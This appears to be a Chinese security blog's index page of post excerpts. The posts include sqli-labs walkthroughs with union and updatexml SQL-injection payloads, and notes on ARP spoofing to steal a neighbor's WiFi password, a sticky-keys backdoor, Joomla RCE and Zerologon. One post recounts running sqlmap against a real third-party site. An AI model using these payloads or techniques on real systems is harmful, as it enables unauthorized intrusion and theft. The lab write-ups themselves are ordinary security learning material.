- 博客(16)
- 收藏
- 关注
原创 sqlmap在https下的一种错误 - ssl连接失败
在昨天与师傅的交流中师傅考了我一个问题,在用sqlmap跑的时候遇到ssl爆红该怎么办,因为在实战中并没有遇到过这种情况,所以今天补一下知识。首先查询了ssl的概念,通俗来说,如果一个网站没有安装ssl证书,那么他的传输方式就是http传输,安装ssl证书过后就是https传输,https传输加密性比http好得多,这是其一;当你访问一些没有安装ssl的网站时,会出现如下界面:没有安装ssl会导致信息很容易被窃取,这是其二;拥有ssl证书的网站会在谷歌和百度拥有更高的权重,通俗来说就是当你搜索一个相同
2021-03-26 12:34:00
5756
原创 汇编指令集合
最近在师傅的领导下着手学习逆向课程,接触了许多汇编语句,开个帖记录一下。pushad:将8个寄存器的值存入内存popad:将原寄存器中的值从内存中取出后复原adc:带进位加法(加上C寄存器)sbb:带进位减法(加上C寄存器)xchg:交换寄存器的值movs:移动数据 内存-内存byte:movsb - movs byte ptr ds:[edi],byte ptr ds:[esi]word:movsw - movs word ptr ds:[edi],word ptr ds:[esi]dw
2021-03-26 12:32:10
583
原创 记一次php、sql注入学习后的一道ctf代码审计题复盘
之前在学校的时候参加了ctf比赛,有幸拿了一个代码审计题的一血,但是当时可能也是算运气比较好吧,因为我的思路并不是常规解法,但还是拿了一血,现在更深入的学习php和sql注入之后,反过来看这道代码审计题,又有一种豁然开朗的感觉。虽然一度到了第二名,但是最后还是没有稳住,不过在我们队伍前面的都是大三的学长,这也不算特别难受吧。...
2021-01-16 22:58:58
822
1
原创 sqli-labs系列——第六关
less6这个本质上跟第五关相同都是使用报错注入,这一关使用的是双引号闭合还是使用updatexml()这个函数?id=1" union select updatexml(1,concat(0x7e,(select user()),0x7e),1)--+爆库名:?id=1" union select updatexml(1,concat(0x7e,(select database()),0x7e),1)--+爆表名:?id=1" union select updatexml(1,con
2021-01-15 18:09:02
2712
3
原创 sqli-labs系列——第五关
less5更改id后无果,不能用union联合查询此处用报错注入报错注入的概念:(1). 通过floor报错 and (select 1 from (select count(*),concat((payload),floor (rand(0)*2))x from information_schema.tables group byx)a) 其中payload为你要插入的SQL语句 需要注意的是该语句将 输出字符长度限制为64个字符(2). 通过updatexml报错 and update
2021-01-15 15:44:11
2387
3
原创 sqli-labs系列——第四关
less4第四关的sql语句是这样的:select * from user where id=("$id");?id=1")–+回显正常order by 4报错,有3列union select 判断有无显示位爆数据库名和列名:?id=-1") union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from inf
2021-01-15 15:12:55
871
原创 sqli-labs系列——第三关
less3判断注入类型这第三关有点意思,是一个带括号的数字型注入,这里需要闭合它的括号,之前遇到过很多这样的站,它的sql语句一般都是这样的:$sql = select * from user where id=('$id');看一下输入’后的信息,能够判断出这是一个数字型注入:此时的sql语句应为:select * from user where id=('1''); ?id=1’ --+报错,?id=1’) --+回显正常此时的sql语句:select * from user wh
2021-01-15 15:02:06
735
1
原创 sqli-labs系列——第二关
less2and 1=1有回显,and 1=2无回显,为数值型注入order by 4–+报错,有3行查询数据库名?id=0' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+查询列名?id=0 union select 1,(select group_concat(schema_name) from information_schema.schemata),(
2021-01-15 14:50:44
295
原创 sqli-labs系列——第一关
php学习告一段落,接下来的时间就是web渗透的练习了,先看了一遍关于sql的一些知识点,通关sqli-labs加深下印象。之前也因为作业的原因通关过前10关,但那时候不懂得原理,跟着网上的教程做的,所以这次尝试自己思考通关。less1尝试and1=2,不为数值注入加单引号报错,判断为单引号字符注入判断表有几行数据,order by 4–+时报错用union联合查询有无显示位查询数据库名?id=0' union select 1,(select group_concat(schema_
2021-01-15 14:46:16
2257
原创 php学习笔记
终于放假到家了,在家还是不能忘了学习。本来一开始是准备先java后php的,但是看了半天java之后感觉入门比较困难,而且寒假只有1个多月的时间,给自己制订的学习计划有很多知识还要学习,所以就放弃了java,先从php入手,如果假期后有剩余的时间就继续java的学习。现在大多数网站都是基于java环境搭建的,比如weblogic,jboss,所以了解并熟悉应用java是很有必要的。因为php需要手写敲代码并运行,所以就没有用有道云记笔记,在vscode上写的代码,索性拿到博客上来巩固。这是寒假的计划,
2021-01-12 19:08:00
307
2
原创 arp欺骗盗取邻居wifi密码
文章开始,解释一下何为arp欺骗:ARP欺骗(英语:ARP spoofing),又称ARP毒化(ARP poisoning,网络上多译为ARP病毒)或ARP攻击,是针对以太网地址解析协议(ARP)的一种攻击技术,通过欺骗局域网内访问者PC的网关MAC地址,使访问者PC错以为攻击者更改后的MAC地址是网关的MAC,导致网络不通。此种攻击可让攻击者获取局域网上的数据包甚至可篡改数据包,且可让网络上特定计算机或所有计算机无法正常连线。首先要安装fluxion这款arp欺骗的软件,可以直接kali下载,或者在w
2021-01-06 20:53:14
4988
原创 粘滞键引起的提权实战
在某论坛阅读文章的时候看到一个粘滞键的概念,一时兴起百度了一下,思考了一下发现似乎有后门可以利用先用我win10虚拟机查看一下win10的粘滞键在什么位置打开控制面板如下:找到键盘打开粘滞键按照提示按了5次shift打开粘滞键,到这个地方我百度了一下粘滞键的概念粘滞键指的是电脑使用中的一种快捷键,专为同时按下两个或多个键有困难的人而设计的。粘滞键的主要功能是方便Shift等键的组合使用。粘滞键可以先按一个键位(如shift),再按另一键位,而不是同时按下两个键位,方便某些因身体原因而无法同时
2021-01-01 21:16:26
663
原创 如何下载b站视频 - 视频下载神器you-get的运用
小伙伴们肯定碰到过发现了自己非常喜欢的视频,但是很多时候要莫是诸如b站不能下载,要么就是诸如腾讯视频需要vip下载,那么今天就给大家介绍一个用dos命令行下载视频的小技巧使用这个命令的先决条件是需要python3环境,如果电脑里没有python3环境必须要先安装python3环境安装好环境后用如下命令安装you-get:pip3 install you-get安装好过后用如下命令下载视频即可,这里我举例一下b站的视频,例如我要下载周董的这首半岛铁盒,我应该要怎么操作呢?如果我们直接把网站复制到
2020-12-28 23:18:01
1619
原创 Joomla框架搭建&远程代码执行(RCE)漏洞复现
一、漏洞描述Joomla是一套内容管理系统,是使用PHP语言加上MYSQL数据库所开发的软件系统,最新版本为3.9.12,官网: https://downloads.joomla.org/,漏洞位于根目录下的configuration.php,由于该CMS对函数过滤不严格,导致了远程代码执行漏洞,该漏洞可能导致服务器被入侵、信息泄露等严重风险。二、漏洞影响版本Joomla 3.0.0-3.4.6三、漏洞环境搭建靶机:WIN10攻击机:kali1.下载Joomla3.4.6,链接如下:http
2020-12-26 10:38:40
3116
原创 域内大杀器CVE-2020-1472复现
前一段时间打ctf第一次接触域渗透,其中CVE-2020-1472被称为域控的大杀器,在本地搭建了个环境复现一下CVE-2020-1472影响的版本:Windows Server 2008 R2 for x64-based Systems Service Pack 1Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)Windows Server 2012Windows Ser
2020-12-25 15:58:44
5781
2
原创 小白的第一次sql踩坑记
第一次写博文,技术有限,大佬轻喷。看到繁体字,当然是湾湾的网站了,找这种sql注入的站用sql检索就行了,但是最好挂代理用谷歌搜索,百度的话搜sql注入的很多被别人打过了,导致链接重置。这个地方很明显的存在sql注入,因为一贯懒的特性,就不手工注入了,直接放sqlmap里面跑一下看看。这个地方是提示我们没有cookie,但是这个网站如果要用sqlmap跑的话必须要加上cookie,所以我们在后面把他的cookie加上。此处注意一下,有些网站用sqlmap跑是不需要cookie的,所以这个看个人
2020-12-24 11:58:29
2480
7
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人